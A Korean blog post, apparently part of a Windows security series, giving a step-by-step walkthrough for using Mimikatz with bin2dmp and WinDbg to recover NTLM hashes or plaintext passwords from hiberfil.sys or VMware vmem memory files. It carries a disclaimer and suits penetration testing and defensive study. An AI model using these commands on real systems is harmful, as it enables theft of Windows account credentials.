공격 도구

Mimikatz를 활용한 윈도우 계정 탈취 - Hyberfil.sys, VMware 페이지 파일 이용

kimnampill 2022. 10. 6. 14:05
728x90
반응형

Windows 보안에 관한 시리즈의 일부로 작성된 이 기사에서는 다음을 사용하여 모든 활성 Windows 사용자의 암호를 얻는 아주 간단한 방법을 배웁니다. Mimikatz.

Mimikatz.exe Windows 메모리, 암호 해시, Kerberos 티켓 등에서 일반 텍스트 암호를 추출할 수 있습니다. 또한 mimikatz를 사용하면 pass-the-hash, pass-the-ticket 공격을 수행하거나 Golden Kerberos 티켓을 생성할 수 있습니다. mimikatz 기능은 Metasploit Framework에서도 사용할 수 있습니다.

당신은 다운로드 할 수 있습니다 mimikatz GitHub 리포지토리에서: https://github.com/gentilkiwi/mimikatz/releases/. mimikatz_trunk.zip 아카이브를 C:Toolsmimikatz에 추출합니다. x64 및 x86용으로 두 가지 버전의 mimikatz가 이 디렉토리에 나타납니다. Windows 비트에 해당하는 버전을 사용하십시오.

 

이 기사에서는 mimikatz를 사용하여 Windows Server 2016 또는 Windows 10에서 사용자 암호를 얻는 방법을 보여줍니다.

Disclaimer. 이 기사에 설명된 정보 및 기술은 정보 제공의 목적으로만 사용해야 하며 제3자의 계정, 데이터 및 시스템에 대한 액세스 권한을 얻지 않아야 합니다.

Contents

  • Mimikatz를 사용하여 LSASS에서 Windows 해시 암호 해킹
  • Hyberfil.sys 및 VM 페이지 파일에서 Windows 암호 추출
  • WDigest를 사용하여 일반 텍스트로 Windows 암호 추출
  • SAM에서 로컬 사용자 암호 해시 추출
  • Mimikatz를 통한 Pass-the-Hash 공격 수행
  • Windows 자격 증명 관리자에서 암호 덤핑
  • 일반 텍스트로 Windows 로그온 암호 덤프
  • 자격 증명 덤핑 공격으로부터 Windows 보호

 

Hyberfil.sys 및 VM 페이지 파일에서 Windows 암호 추출

시스템 최대 절전 모드 파일(hiberfil.sys), 가상 머신 파일의 vmem(가상 머신 페이징 파일 및 해당 스냅샷).

 

Debugging Tool for Windows (WinDBG), mimikatz, bin2dmp.exe를 준비

(Hyper-V에서는 vm2dmp.exe 또는 VMWare vmem-files용 MoonSols Windows 메모리 툴킷일 수 있음).

 

예를 들어, VMWare 가상 머신의 vmem 페이지 파일을 덤프로 변환하려면 다음 명령을 사용하십시오.

bin2dmp.exe “wsrv2008r2-1.vmem” vmware.dmp

 

덤프를 WinDbg(파일 -> 크래시 덤프 열기)로 가져오고 mimikatz 라이브러리 mimilib.dll을 로드합니다.

.load mimilib.dll

 

덤프에서 lsass.exe 프로세스를 찾습니다.

!process 0 0 lsass.exe

 

마지막으로 다음을 입력합니다.

.process /r /p fffffa800e0b3b30
!mimikatz

결과적으로 Windows 사용자 목록과 암호의 NTLM 해시 또는 일반 텍스트 암호를 얻을 수 있습니다.

 

반응형